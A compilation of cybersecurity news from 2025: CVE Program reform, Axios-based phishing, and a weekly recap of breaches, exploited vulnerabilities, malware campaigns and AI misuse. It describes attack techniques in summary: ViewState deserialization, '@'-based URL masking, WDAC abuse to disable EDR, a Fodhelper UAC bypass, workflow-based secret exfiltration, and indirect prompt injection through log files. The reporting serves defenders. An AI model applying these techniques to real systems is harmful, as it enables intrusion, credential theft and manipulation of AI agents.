the CVE Program was good for the community because it has led to a wider discussion on how to make it better and more efficient. VulnCheck security researcher Patrick Garrity said CISA’s roadmap is a good starting point for reforming the CVE Program. VulnCheck has been the largest private sector contributor to CISA’s Vulnrichment effort to add more information to critical CVE entries. Garrity lauded CISA for offering to include researchers, academia, open-source communities and international partners in the CVE Program’s evolution. He theorized that CISA’s statements about taking a more active role in the long-term stewardship of the program “indicates the organization may assume the secretariat role in administering the program, and governance could shift to direct government oversight.” “There are plenty of opportunities for improvement across areas that have presented persistent challenges, such as transparency, communication, responsiveness, timely execution and collaboration,” he said. “CISA directly acknowledges the transparency and communication issues long cited by participants, and the commitment to milestone reporting, regular dialogue and expanding engagement beyond traditional software suppliers is critical to bridging trust gaps within the community.” Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.
therecord.mediaSep 19, 2025extracted
Axios User Agent Helps Automate Phishing on “Unprecedented Scale”
Security experts have warned of a huge uptick in automated phishing activity abusing the Axios user agent and Microsoft’s Direct Send feature. ReliaQuest claimed in a new report today that it observed a 241% increase in phishing activity using Axios between June and August 2025. Axios accounted for nearly a quarter (24%) of all malicious user-agent activity analyzed in the period, making it 10 times more common than any other agents tracked by ReliaQuest. The threat intelligence vendor said Axios-powered attacks had a 58% success rate versus just 9% for incidents without the user agent. What started as a campaign targeting executives and managers in sectors like finance, healthcare and manufacturing has now broadened to regular internet users, it added. Axios is a lightweight, promise-based HTTP client that enables attackers to scale their phishing campaigns with little effort, the report claimed. Although a legitimate tool, the agent’s ability to intercept, modify and replay HTTP requests with ease and blend seamlessly into workflows makes it particularly prized. “Its promise-based API and middleware interceptors let attackers log, tweak, replay, and troubleshoot easily. This makes it easier to bypass multifactor authentication (MFA), hijack session tokens, and tailor attacks to each target,” said ReliaQuest. “In the Axios activity we saw, QR codes and phishing domains set the trap, then Axios let attackers exploit the data they captured. In the incidents we observed, Axios played a pivotal role in interacting with APIs and bypassing MFA protections.” Other user agents require threat actors to write complex custom scripts or rely on tools that are more obviously suspicious, whereas Axios combines flexibility and easy automation, and will pass most user-agent analysis and reputation-based filter checks, the report noted. Direct Send Amplifies Attacks ReliaQuest noted that attacks that paired Axios with Microsoft’s Direct Send achieved an even higher (70%) success rate in recent campaigns. That’s because Direct Send is typically trusted by security tools by default. “Together, Direct Send and Axios form a highly efficient attack pipeline: Direct Send delivers phishing emails that appear legitimate, while Axios automates backend workflows like intercepting MFA tokens and authenticating stolen credentials,” the report explained. “This seamless system allows attackers to operate at scale with minimal effort, blending into legitimate Axios traffic and evading detection.” ReliaQuest urged organizations to mitigate the threat of Axios abuse by: Disabling Direct Send if not needed. If it is used, organizations are urged to enforce stricter controls and route internal email activity through an email security gateway for threat inspection, like scanning for malicious QR codes, URLs or PDF attachments Configure anti-spoofing policies on email gateways to block emails pretending to come from trusted sources Train all users, including executives, to recognize phishing emails with subject lines like “MEM0,” “0VERDUE,” and “INV0ICE” Block uncommon top-level domains like .es and .ru unless required for business reasons
infosecurity-magazine.comSep 9, 2025extracted
⚡ Weekly Recap: Drift Breach Chaos, Zero-Days Active, Patch Warnings, Smarter Threats & More
Cybersecurity never slows down. Every week brings new threats, new vulnerabilities, and new lessons for defenders. For security and IT teams, the challenge is not just keeping up with the news—it’s knowing which risks matter most right now. That’s what this digest is here for: a clear, simple briefing to help you focus where it counts. This week, one story stands out above the rest: the Salesloft–Drift breach, where attackers stole OAuth tokens and accessed Salesforce data from some of the biggest names in tech. It’s a sharp reminder of how fragile integrations can become the weak link in enterprise defenses. Alongside this, we’ll also walk through several high-risk CVEs under active exploitation, the latest moves by advanced threat actors, and fresh insights on making security workflows smarter, not noisier. Each section is designed to give you the essentials—enough to stay informed and prepared, without getting lost in the noise. ⚡ Threat of the Week Salesloft to Take Drift Offline Amid Security Incident — Salesloft announced that it has taken Drift temporarily offline effective September 5, 2025, at 6 a.m. ET, as multiple companies have been caught up in a far-reaching supply chain attack spree targeting the marketing software-as-a-service product, resulting in the mass theft of authentication tokens. "This will provide the fastest path forward to comprehensively review the application and build additional resiliency and security in the system to return the application to full functionality," the company said. "As a result, the Drift chatbot on customer websites will not be available, and Drift will not be accessible. To date, Cloudflare, Google Workspace, PagerDuty, Palo Alto Networks, Proofpoint, SpyCloud, Tanium, Tenable, and Zscaler have confirmed they were impacted by the hack. The activity has been attributed to a threat cluster tracked by Google and Cloudflare as UNC6395 and GRUB1, respectively. Zero Trust + AI: Thrive in the AI Era and Empower Your Workforce It’s no surprise, hackers are using AI in creative ways to compromise users and breach organizations. Zscaler Zero Trust + AI helps defeat ransomware and AI-power attacks today by enabling you to detect and block advanced threats, and discover and classify sensitive data everywhere. Learn more about Zscaler Zero Trust + AI ➝ 🔔 Top News Sitecore Flaw Under Active Exploitation in the Wild — Unknown miscreants are exploiting a configuration vulnerability in multiple Sitecore products to achieve remote code execution via a publicly exposed key and deploy snooping malware on infected machines. The ViewState deserialization vulnerability, CVE-2025-53690, has been used to deploy malware and additional tooling geared toward internal reconnaissance and persistence across one or more compromised environments. The attackers targeted the "/sitecore/blocked.aspx" endpoint, which contains an unauthenticated ViewState form, with HTTP POST requests containing a crafted ViewState payload. Mandiant said it disrupted the intrusion midway, which prevented it from gaining further insights into the attack lifecycle and determining the attackers' motivations. Russian APT28 Deploys "NotDoor" Outlook Backdoor — The Russian state-sponsored hacking group tracked as APT28 has been attributed to a new Microsoft Outlook backdoor called NotDoor (aka GONEPOSTAL) in attacks targeting multiple companies from different sectors in NATO member countries. NotDoor "is a VBA macro for Outlook designed to monitor incoming emails for a specific trigger word," S2 Grupo's LAB52 threat intelligence team said. "When such an email is detected, it enables an attacker to exfiltrate data, upload files, and execute commands on the victim's computer." New GhostRedirector Actor Hacks 65 Windows Servers in Brazil, Thailand, and Vietnam — A previously undocumented threat cluster dubbed GhostRedirector has managed to compromise at least 65 Windows servers primarily located in Brazil, Thailand, and Vietnam. The attacks, per Slovak cybersecurity company ESET, led to the deployment of a passive C++ backdoor called Rungan and a native Internet Information Services (IIS) module codenamed Gamshen. The threat actor is believed to be active since at least August 2024. "While Rungan has the capability of executing commands on a compromised server, the purpose of Gamshen is to provide SEO fraud as-a-service, i.e., to manipulate search engine results, boosting the page ranking of a configured target website," the company said. Google Fixes 2 Actively Exploited Android Flaws — Google has shipped security updates to address 120 security flaws in its Android operating system as part of its monthly fixes for September 2025, including two issues that it said have been exploited in targeted attacks. One of them, CVE-2025-38352, is a privilege escalation vulnerability in the upstream Linux Kernel component. The second shortcoming is a privilege escalation flaw in Android Runtime (CVE-2025-48543). Benoît Sevens of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the upstream Linux Kernel flaw, suggesting that it may have been abused as part of targeted spyware attacks. Threat Actors Claim to Weaponize HexStrike AI in Real-World Attacks — Threat actors are attempting to leverage a newly released artificial intelligence (AI) offensive security tool called HexStrike AI to exploit recently disclosed security flaws. "This marks a pivotal moment: a tool designed to strengthen defenses has been claimed to be rapidly repurposed into an engine for exploitation, crystallizing earlier concepts into a widely available platform driving real-world attacks," Check Point said. Iranian Hackers Linked to Attacks Targeting European Embassies — An Iran-nexus group conducted a "coordinated" and "multi-wave" spear-phishing campaign targeting the embassies and consulates in Europe and other regions across the world. The activity has been attributed by Israeli cybersecurity company Dream to Iranian-aligned operators connected to broader offensive cyber activity undertaken by a group known as Homeland Justice. "Emails were sent to multiple government recipients worldwide, disguising legitimate diplomatic communication," the company said. "Evidence points toward a broader regional espionage effort aimed at diplomatic and governmental entities during a time of heightened geopolitical tension." 🔥 Trending CVEs Hackers move fast — often exploiting new flaws within hours. A missed update or a single unpatched CVE can open the door to serious damage. Here are this week’s high-risk vulnerabilities making headlines. Review, patch quickly, and stay ahead. This week's list includes — CVE-2025-53690 (SiteCore), CVE-2025-42957 (SAP S/4HANA), CVE-2025-9377 (TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9), CVE-2025-38352 (Linux Kernel/Google Android), CVE-2025-48543 (Google Android), CVE-2025-29927 (Next.js), CVE-2025-52856, CVE-2025-52861 (QNAP QVR), CVE-2025-0309 (Netskope Client for Windows), CVE-2025-21483, CVE-2025-27034 (Qualcomm), CVE-2025-6203 (HashiCorp Vault), CVE-2025-58161 (MobSF), CVE-2025-5931 (Dokan Pro plugin), CVE-2025-53772 (Web Deploy), CVE-2025-9864 (Google Chrome), CVE-2025-9696 (SunPower PVS6), CVE-2025-57833 (Django), CVE-2025-24204 (Apple macOS), CVE-2025-55305 (Electron framework), CVE-2025-53149 (Microsoft Kernel Streaming WOW Thunk Service Driver), CVE-2025-6519, CVE-2025-52549, CVE-2025-52548 (Copeland E2 and E3), CVE-2025-58782 (Apache Jackrabbit), CVE-2025-55190 (Argo CD), CVE-2025-1079, CVE-2025-4613, and a client-side remote code execution (no CVE) (Google Web Designer). 📰 Around the Cyber World New AI Waifu RAT Disclosed — Cybersecurity researchers have discovered a potent Windows-based remote access trojan (RAT) called AI Waifu RAT that uses the power of a large language model to pass commands. "A local agent runs on the victim's machine, listening for commands on a fixed port," a researcher by the name ryingo said. "These commands, originating from the LLM, are passed through a web UI and sent to the local agent as plaintext HTTP requests." The malware specifically targets LLM role-playing communities, capitalizing on their interest in the technology to offer AI characters the ability to read local files for "personalized role-playing" and direct "Arbitrary Code Execution" capabilities. DoJ: "Not all heroes wear capes. Some have YouTube channels" — The U.S. Department of Justice (DoJ) said two YouTube channels named Scammer Payback and Trilogy Media played a crucial role in unmasking and identifying members of a giant scam network that stole more than $65 million from senior citizens. The 28 alleged members of the Chinese organized crime ring allegedly used call centers based in India to call the elderly, posing as government officials, bank employees, and tech support agents. "Once connected, the scammers used scripted lies and psychological manipulation to gain the victims' trust and often remote access to their computers," the DoJ said. "The most common scheme involved convincing victims they had received a mistaken refund and pressuring – or threatening – them to return the supposed excess funds via wire transfer, cash, or gift cards." Those sending cash were instructed to use overnight or express couriers, addressing packages to fake names tied to false IDs. These were sent to short-term rentals in the U.S. used by conspirators, including the indicted defendants, to collect the fraud proceeds. The network has operated out of Southern California since 2019. Analysis of BadSuccessor Patch — Microsoft, as part of its August 2025 Patch Tuesday update, addressed a security flaw called BadSuccessor (CVE-2025-53779) that abused a loophole in dMSA, causing the Key Distribution Center (KDC) to treat a dMSA linked to any account in Active Directory as the successor during authentication. As a result, an attacker could create a dMSA in an Organizational Unit (OU) and link it to any target — even domain controllers, Domain Admins, Protected Users, or accounts marked "sensitive and cannot be delegated" – and compromise them. An analysis of the patch has revealed that patch enforcement was implemented in the KDC's validation. "The attribute can still be written, but the KDC won't honor it unless the pairing looks like a legitimate migration," Akamai security researcher Yuval Gordon said. "Although the vulnerability can be patched, BadSuccessor still lives on as a technique; that is, the KDC’s verification removes the pre-patch escalation path, but doesn't mitigate the entire problem. Because the patch didn't introduce any protection to the link attribute, an attacker can still inherit another account by linking a controlled dMSA and a target account." Phishers Pivot to Ramp and Dump Scheme — Cybercriminal groups advertising sophisticated phishing kits that convert stolen card data into mobile wallets have shifted their focus to targeting customers of brokerage services and using compromised brokerage accounts to manipulate the prices of foreign stocks as part of what's called a ramp and dump scheme. Popular C2 Frameworks Exploited by Threat Actors — Sliver, Havoc, Metasploit, Mythic, Brute Ratel C4, and Cobalt Strike (in that order) have emerged as the most frequently used command-and-control (C2) frameworks in malicious attacks in Q2 2025, per data from Kaspersky. "Attackers are increasingly customizing their C2 agents to automate malicious activities and hinder detection," the company said. The development came as the majority (53%) of attributed vulnerability exploits in the first half of 2025 were conducted by state-sponsored actors for strategic, geopolitical purposes, according to Recorded Future's Insikt Group. In all, 23,667 CVEs were published in H1 2025, a 16% increase compared to H1 2024. Attackers actively exploited 161 vulnerabilities, and 42% of those exploited flaws had public PoC exploits. Fake PDF Converters Deliver JSCoreRunner macOS Malware — Apps posing as PDF converters are being used to deliver malware called JSCoreRunner. Once downloaded from sites like fileripple[.]com, the malware establishes connections with a remote server and hijacks a user's Chrome browser by modifying its search engine settings to default to a fraudulent search provider, thereby tracking user searches and redirecting them to bogus sites, further exposing them to data and financial theft, per Mosyle. The attack unfolds over two stages: The initial package (whose signature has since been revoked by Apple), which deploys an unsigned secondary payload from the same domain that, in turn, executes the main malicious payload. Copeland Releases Fixes for Frostbyte10 Flaws — American tech company Copeland has released a firmware update to fix ten vulnerabilities in Copeland E2 and E3 controllers. The chips are used to manage energy efficiency inside HVAC and refrigeration systems. The ten vulnerabilities have been collectively named Frostbyte10. "The flaws discovered could have allowed unauthorized actors to remotely manipulate parameters, disable systems, execute remote code, or gain unauthorized access to sensitive operational data," Armis said. "When combined and exploited, these vulnerabilities can result in unauthenticated remote code execution with root privileges." The most severe of the flaws is CVE-2025-6519, a case of a default admin user "ONEDAY" with a daily generated password that can be predictably generated. In a hypothetical attack scenario, an attacker could chain CVE-2025-6519 and CVE-2025-52549 with CVE-2025-52548, which can enable SSH and Shellinabox access via a hidden API call, to facilitate remote execution of arbitrary commands on the underlying operating system. Over 1,000 Ollama Servers Exposed — A new study from Cisco found over 1,100 exposed Ollama servers, with approximately 20% actively hosting models susceptible to unauthorized access. Out of the 1,139 exposed servers, 214 were found to be actively hosting and responding to requests with live models—accounting for approximately 18.8% of the total scanned population, with Mistral and LLaMA representing the most frequently encountered deployments. The remaining 80% of detected servers, while reachable via unauthenticated interfaces, did not have any models instantiated. Although dormant, these servers remain susceptible to exploitation via unauthorized model uploads or configuration manipulation. The findings "highlight the urgent need for security baselines in LLM deployments and provide a practical foundation for future research into LLM threat surface monitoring," the company said. Tycoon Phishing Kit Evolves — The Tycoon phishing kit has been updated to support URL-encoding techniques to hide malicious links embedded in fake voicemail messages to bypass email security checks. Attackers have also been observed using the Redundant Protocol Prefix technique for similar reasons. "This involves crafting a URL that is only partially hyperlinked or that contains invalid elements — such as two 'https' or no '//' — to hide the real destination of the link while ensuring the active part looks benign and legitimate and doesn't arouse suspicion among targets or their browser controls," Barracuda said. "Another trick is using the '@' symbol in a web address. Everything before the '@' is treated as 'user info' by browsers, so attackers put something that looks reputable and trustworthy in this part, such as 'office365.' The link’s actual destination comes after the '@.'" U.S. State Department Offers Up to $10M for Russian Hackers — The U.S. Department of State is offering a bounty of up to $10 million for information on three Russian Federal Security Service (FSB) officers involved in cyberattacks targeting U.S. critical infrastructure organizations on behalf of the Russian government. The three individuals, Marat Valeryevich Tyukov, Mikhail Mikhailovich Gavrilov, and Pavel Aleksandrovich Akulov, are part of the FSB's Center 16 or Military Unit 71330, which is tracked as Berserk Bear, Blue Kraken, Crouching Yeti, Dragonfly, Koala Team, and Static Tundra. They have been accused of targeting 500 energy companies in 135 countries. In March 2022, the three FBS officers were also charged for their involvement in a campaign that took place between 2012 and 2017, targeting U.S. government agencies. XWorm Malware Uses Sneaky Methods to Evade Detection — A new XWorm malware campaign is using deceptive and intricate methods to evade detection and increase the success rate of the malware. "The XWorm malware infection chain has evolved to include additional techniques beyond traditional email-based attacks," Trellix said. "While email and .LNK files remain common initial access vectors, XWorm now also leverages legitimate-looking .EXE filenames to disguise itself as harmless applications, exploiting user and system trust." The attack chain uses LNK files to initiate a complex infection. Executing the .LNK triggers malicious PowerShell commands that deliver a .TXT file and download a deceptively-named binary called "discord.exe." The executable then drops "main.exe" and "system32.exe," with the latter being the XWorm malware payload. "Main.exe," on the other hand, is responsible for disabling the Windows Firewall and checking for the presence of -third-party security applications. XWorm, besides meticulously conducting reconnaissance to acquire a comprehensive profile of the machine, runs anti-analysis checks to ascertain the presence of a virtualized environment, and, if so, ceases execution. It also incorporates backdoor functionality by contacting an external server to execute commands, shut down the system, download files, open URLs, and launch DDoS attacks. Recent campaigns distributing the malware through a new crypter-as-a-service offering known as Ghost Crypt. "Ghost Crypt delivers a zipped archive to the victim containing a PDF Reader application, a DLL, and a PDF file," Kroll said. "When the user opens the PDF, the malicious DLL is side-loaded, initiating the malware execution." The PDF Reader application is HaiHaiSoft PDF Reader, which is known to have a DLL side-loading vulnerability, previously exploited to deliver Remcos RAT, NodeStealer, and PureRAT. 2 E-Crime Groups Use Stealerium Stealer in New Campaigns — Two different cybercriminal groups, TA2715 and TA2536, both of which favored Snake Keylogger, have conducted phishing campaigns in May 2025, delivering an open-source information stealer called Stealerium (or variants of it). "The observed emails impersonated many different organizations, including charitable foundations, banks, courts, and document services, which are common themes in e-crime lures," Proofpoint said. "Subject lines typically conveyed urgency or financial relevance, including 'Payment Due,' 'Court Summons,' and 'Donation Invoice.'" Czechia Issues Warning Against Chinese Tech in Critical Infrastructure — NÚKIB, the Czech Republic's cybersecurity agency, has issued a bulletin regarding the threat posed by technology systems that transfer data to, or are remotely managed from, China. "Current critical infrastructure systems are increasingly dependent on storing and processing data in cloud repositories and on network connectivity enabling remote operation and updates," the agency warned. "In practice, this means that technology solution providers can significantly influence the operation of critical infrastructure and/or access important data, making trust in the reliability of the provider absolutely crucial." Google Chrome 140 Gains Support for Cookie Prefixes — Google has released version 140 of its Chrome browser with support for a new security feature designed to protect server-set cookies from client-side modifications. Called a cookie prefix, it involves adding a piece of text before the names of a browser's cookies. "In some cases, it's important to distinguish on the server side between cookies set by the server and those set by the client. One such case involves cookies normally always set by the server," Google said. "However, unexpected code (such as an XSS exploit, a malicious extension, or a commit from a confused developer) might set them on the client. This proposal adds a signal that lets servers make such a distinction. More specifically, it defines the Http and HostHttp prefixes, which ensure a cookie is not set on the client side using script." New Ransomware Strains Detailed — A new ransomware group called LunaLock has hacked an art-commissioning portal called Artists&Clients and is extorting its owners and artists by threatening to submit the stolen artwork to train artificial intelligence (AI) models unless it pays a $50,000 ransom. Another newly observed ransomware crew is Obscura, which was first observed by Huntress on August 29, 2025. The Go-based ransomware variant attempts to terminate over 120 processes commonly tied to security tools like Microsoft Defender, CrowdStrike, and SentinelOne. E.U. Court Backs Data Transfer Deal Agreed by U.S. and E.U. — The General Court of the Court of Justice of the European Union has dismissed a lawsuit that sought to annul the E.U. and U.S. Data Privacy Framework. The court ruled that the new treaty and the US adequately safeguard the personal data of E.U. citizens. The lawsuit alleged that the U.S. Data Protection Review Court (DPRC), which is housed inside the Department of Justice and has been historically seen as a bulwark for checking U.S. data surveillance activities, is not sufficiently independent and does not adequately shield Europeans from bulk data collection by U.S. intelligence agencies. Microsoft to Move to Phase 2 of MFA Enforcement in October 2025 — Microsoft said it has been enforcing multi-factor authentication (MFA) for Azure Portal sign-ins across all tenants since March 2025. "We are proud to announce that multi-factor enforcement for Azure Portal sign-ins was rolled out for 100% of Azure tenants in March 2025," the company said. "By enforcing MFA for Azure sign-ins, we aim to provide you with the best protection against cyber threats as part of Microsoft's commitment to enhancing security for all customers, taking one step closer to a more secure future." The next phase of MFA requirement is scheduled to start October 1, 2025, mandating the use of MFA for users performing Azure resource management operations through Azure Command-Line Interface (CLI), Azure PowerShell, Azure Mobile App, REST APIs, Azure Software Development Kit (SDK) client libraries, and Infrastructure as Code (IaC) tools. Surge in Scanning Activity Targeting Cisco ASA — GreyNoise said it detected two scanning surges against Cisco Adaptive Security Appliance (ASA) devices on August 22 and 26, 2025, with the first wave originating from over 25,100 IP addresses mainly located in Brazil, Argentina, and the U.S. The second spike repeated ASA probing, with subsets hitting both IOS Telnet/SSH and ASA software personas. The activity targeted the U.S., the U.K., and Germany. LinkedIn Expands Verification to Combat Job-Themed Scams — Microsoft-owned professional social network unveiled new measures to strengthen trust and ensure that users are interacting with people who "they say they are." This includes verified Premium Company Pages, requiring recruiters to verify their workplace on their profile, and workplace verification requirements for high-level titles such as Executive Director, Managing Director, and Vice President to tackle impersonation. The changes are an effort to prevent scammers from posing as company employees or recruiters and reaching out to prospective targets with fake job opportunities – a technique pioneered by North Korean hackers. Hotelier Accounts Targeted in Malvertising and Phishing Campaign — A large-scale phishing campaign has impersonated at least 13 service providers that specialize in hotels and vacation rentals. "In these attacks, targeted users are lured to highly deceptive phishing sites using malicious search engine advertisements, particularly sponsored ads on platforms like Google Search," Okta said. "The attacks leverage convincing fake login pages and social engineering tactics to bypass security controls and exploit user trust." It's assessed that the end goal of the campaign is to compromise accounts for cloud-based property management and guest messaging platforms. DamageLib Emerges After XSS Forum Takedown — A new cybercrime forum called DamageLib has grown dramatically, attracting over 33,000 users following the arrest of XSS[.]is admin Toha back in July 2025. While XSS remains online, speculations are abound that it could be a law enforcement honeypot, breeding mistrust among cybercriminals. "Exploit forum traffic surged almost 24% during the XSS turmoil as actors sought alternatives, while XSS visits plummeted," KELA said. "As of August 27, 2025, DamageLib counted 33,487 users -- nearly 66% of XSS's 50,853 members. But engagement lagged: only 248 threads and 3,107 posts in its first month, compared to over 14,400 messages on XSS in the month before the seizure." GhostAction Supply Chain Attack Steals 3,325 Secrets — A massive supply chain attack dubbed GhostAction has allowed attackers to inject a malicious GitHub workflow named "Github Actions Security" to exfiltrate 3,325 secrets, including PyPI, npm, and DockerHub tokens via HTTP POST requests to a remote attacker-controlled endpoint ("bold-dhawan.45-139-104-115.plesk[.]page"). The activity, which allowed the workflows to be triggered automatically on 'push' or manual dispatch, affected 327 GitHub users across 817 repositories. Some of the workflow commits were pushed by a user named "Grommash9," which is no longer accessible. "Over the weekend, we had discussions with developers targeted by the attack and the initial vector is still unclear, but could be related to GitHub tokens leaks," Guillaume Valadon, cybersecurity researcher at GitGuardian, told The Hacker News. "As a prevention measure, they revoked all of their GitHub tokens as well as secrets accessible from their GitHub Actions." New Campaign Abuses Simplified AI to Steal Microsoft 365 Credentials — A new phishing campaign has been observed hosting fake pages under the legitimate Simplified AI domain in a bid to evade detection and blend in with regular enterprise traffic. "By impersonating an executive from a global pharmaceutical distributor, the threat actors delivered a password-protected PDF that appeared legitimate," Cato Networks said. "Once opened, the file redirected the victim to Simplified AI’s website, but instead of generating content, the site became a launchpad to a fake Microsoft 365 login portal designed to harvest enterprise credentials." Japan, South Korea, and the U.S. Take Aim at North Korean IT Worker Scam — Japan, South Korea, and the U.S. joined hands to fight against the growing threat of North Korean threat actors posing as IT workers to embed themselves in organizations throughout Asia and globally and generate revenue to fund its unlawful weapons of mass destruction (WMD) and ballistic missile programs. "They take advantage of existing demands for advanced IT skills to obtain freelance employment contracts from an expanding number of target clients throughout the world, including in North America, Europe, and East Asia," the countries said in a joint statement. "North Korean IT workers themselves are also highly likely to be involved in malicious cyber activities, particularly in the blockchain industries. Hiring, supporting, or outsourcing work to North Korean IT workers increasingly poses serious risks, ranging from theft of intellectual property, data, and funds to reputational harm and legal consequences." New AI-Powered Android Vulnerability Discovery and Validation Tool — Computer scientists affiliated with Nanjing University in China and The University of Sydney in Australia said that they've developed an AI vulnerability identification system called A2 that emulates the way human bug hunters go about discovering flaws, marking a step forward for automated security analysis. According to the study, A2 "validates Android vulnerabilities through two complementary phases: (i) Agentic Vulnerability Discovery, which reasons about application security by combining semantic understanding with traditional security tools; and (ii) Agentic Vulnerability Validation, which systematically validates vulnerabilities across Android's multi-modal attack surface-UI interactions, inter-component communication, file system operations, and cryptographic computations." A2 builds upon A1, an agentic system that transforms any LLM into an end-to-end exploit generator. Spotify DM Feature Carries Doxxing Risks — Music streaming service Spotify, last month, announced a new messaging feature for sharing music with friends. But reports are now emerging on Reddit that it's surfacing as "suggested friends," people with whom users may have shared Spotify links in the past on other social media platforms, potentially revealing their real names in the process. This is made possible by means of a unique "si" parameter in Spotify links that serves as referral information. Spear-Phishing Campaign Targets C-Suite for Credential Theft — A sophisticated spear-phishing campaign has targeted senior employees, particularly those in C-Suite and leadership positions, to steal their credentials using email messages with salary-themed lures or fake OneDrive document-sharing notifications. "Actors behind this campaign are leveraging tailored emails that impersonate internal HR communications, via a shared document in OneDrive, to trick recipients into entering corporate credentials," Stripe OLT said. "Emails are sent via Amazon Simple Email Service (SES) infrastructure. The actor is rotating between many sending domains and subdomains to evade detection." As many as 80 domains have been identified as part of this campaign. Attackers Attempt to Exploit WDAC Technique — In December 2024, researchers Jonathan Beierle and Logan Goins demonstrated a novel technique that leverages a malicious Windows Defender Application Control (WDAC) policy to block security solutions such as Endpoint Detection and Response (EDR) sensors following a system reboot using a custom tool codenamed Krueger. Since then, it has emerged that threat actors have incorporated the method into their attack arsenal to disable security solutions using WDAC policies. It has also led to the discovery of a new malware strain dubbed DreamDemon that uses WDAC to neutralize antivirus programs. It contains an embedded WDAC policy, which is then dropped onto disk and hidden," Beierle said. "In certain cases, DreamDemon will also change the time that the policy was created in an attempt to avoid detection." New NBMiner Cryptojacking Malware Detected — Cybersecurity researchers have discovered a new campaign that leverages a PowerShell script to drop an AutoIt loader used to deliver a cryptocurrency miner called NBMiner from an external server. Initial access to the system is accomplished by means of a drive-by compromise. "The program includes several evasion measures," Darktrace said. "It performs anti-sandboxing by sleeping to delay analysis and terminates sigverif.exe (File Signature Verification). It checks for installed antivirus products and continues only when Windows Defender is the sole protection. It also verifies whether the current user has administrative rights. If not, it attempts a User Account Control (UAC) bypass via Fodhelper to silently elevate and execute its payload without prompting the user." New Campaign Uses Custom GPTs for Brand Impersonation and Phishing — Threat actors are abusing custom features on trusted AI platforms like OpenAI ChatGPT to create malicious "customer support" chatbots that impersonate legitimate brands. These custom GPTs are surfaced on Google Search results, tricking users into taking malicious actions under the guise of a helpful chatbot, underscoring how AI tools can be misused within a broader social engineering chain. "This method introduces a new threat vector: platform-hosted social engineering through trusted AI interfaces," Doppel said. "Several publicly available Custom GPTs have been observed impersonating well-known companies." The attacks can lead to theft of sensitive information, malware delivery, and damage the reputation of legitimate brands. The development is part of a larger trend where cybercriminals abuse AI tools, including impersonation fraud via deepfakes, AI-assisted scam call centers, AI-powered mailers and spam tools, malicious tool development, and unrestricted and self-hosted generative AI chatbots that can craft phishing kits, fake websites; create content for romance or investment scams; develop malware; and assist with vulnerability reconnaissance and exploit chains. McDonald's Poland Fined for Leaking Personal Data — Poland's data protection agency fined McDonald's Poland nearly €4 million for leaking employee personal data, violating GDPR data privacy protections. The incident occurred at a partner company that managed employee work schedules. Personal data such as names, passport numbers, positions, and work schedules were left exposed on the internet through an open directory. This is the second-largest GDPR fine handed out by Polish authorities after fining the country's postal service €6.3 million earlier this year. In related news, vulnerabilities in the McDonald's chatbot recruitment platform McHire exposed over 64 million job applications across the U.S., security researchers Ian Carroll and Sam Curry discovered. The chatbot was created by Paradox.ai, which did not remove the default credentials for a test account (username 123456, password 123456) and failed to secure an endpoint that allowed access to the chat interactions of every applicant. There is no evidence that the test account was ever exploited in a malicious context. A separate set of security issues has also been discovered in the fast-food giant's partner and employee portals that exposed sensitive data such as API keys and enabled unauthorized access to make changes to a franchise owner's website. The issues, according to BobdaHacker, have since been patched. New Influence Operations Discovered — Cybersecurity company Recorded Future flagged two large-scale, state-aligned influence operation networks supporting India and Pakistan during the India-Pakistan conflict of April and May 2025. These influence networks have been codenamed Hidden Charkha (pro-India) and Khyber Defender (pro-Pakistan). "These networks are very likely motivated by patriotism and are almost certainly aligned with India's and Pakistan's domestic and foreign policy objectives, respectively," Recorded Future said. "Each network consistently attempted to frame India or Pakistan, respectively, as maintaining superior technological and military capabilities – and therefore the implied ability for each respective country to exercise tactical restraint – as proof of having the moral high ground, and hence having domestic and international support." Both the campaigns were largely unsuccessful in shaping public opinion, given the lack of organic engagement on social media. A second influence operation involves multiple Russia-linked networks, such as Operation Overload, Operation Undercut, Foundation to Battle Injustice, and Portal Kombat, seeking to destabilize the elections and derail Moldova's European Union (E.U.) accession. Besides attempting to frame the current Moldova leadership as corrupt and counter to Moldova's interests, the activity portrays "Moldova's further integration with the E.U. as disastrous for its economic future and sovereignty, and Moldova as a whole as at odds with European standards and values." The campaign has not achieved any substantial success in shaping public opinion, Recorded Future added. Massive IPTV Piracy Network Uncovered — A large Internet Protocol Television (IPTV) piracy network spanning more than 1,100 domains and over 10,000 IP addresses has been discovered hosting pirated content, illegally restreaming licensed channels, and engaging in subscription fraud. Active for several years, more than 20 major brands have been affected, including: Prime Video, Bein Sports, Disney Plus, NPO Plus, Formula 1, HBO, Viaplay, Videoland, Discovery Channel, Ziggo Sports, Netflix, Apple TV, Hulu, NBA, RMC Sport, Premier League, Champions League, Sky Sports, NHL, WWE, and UFC. Silent Push said it identified a company named XuiOne that's involved in profiting from hosting pirated content. XuiOne is believed to share connections with Stalker_Portal, another well-known open-source IPTV project that has been around since 2013. These services are advertised in the form of Android apps, with the domains distributed via Facebook groups and Imgur. Security Analysis of WhatsApp Message Summarization — NCC Group has published an in-depth analysis of WhatsApp's AI-powered Message Summarization feature, which was announced by the messaging platform in June 2025. In all, the assessment discovered 21 findings, 16 of which were fixed by WhatsApp. This included three notable weaknesses: The hypervisor could have assigned network interfaces to the CVM through which private data could be exfiltrated; any old Confidential Virtual Machine (CVM) image with known vulnerabilities could have been indefinitely used by an attacker; and the ability to serve malicious key configurations to WhatsApp clients could have allowed Meta to violate privacy and non-targetability assurances. Indirect Prompt Injection via Log Files — Large language models (LLMs) used in a security context can be deceived by specially crafted events and log files injected with hidden prompts to execute malicious actions when they are parsed by AI agents. 🎥 Cybersecurity Webinars From Blind Spots to Clarity: Why Code-to-Cloud Visibility Defines Modern AppSec — Most security programs know their risks—but not where they truly begin or how they spread. That gap between code and cloud is costing teams time, ownership, and resilience. This webinar shows how code-to-cloud visibility closes that gap by giving developers, DevOps, and security a shared view of vulnerabilities, misconfigurations, and runtime exposure. The result? Less noise, faster fixes, and stronger protection for the applications your business depends on. Shadow AI Agents: The Hidden Risk Driving Enterprise Blind Spots — AI Agents are no longer futuristic—they’re already embedded in your workflows, processes, and platforms. The problem? Many of them are invisible to governance, fueled by unchecked non-human identities that create a growing attack surface. Shadow AI doesn’t just add complexity; it multiplies risk with every click. This webinar unpacks where these agents are hiding, how to spot them before attackers do, and what steps you can take to bring them under control without slowing innovation. 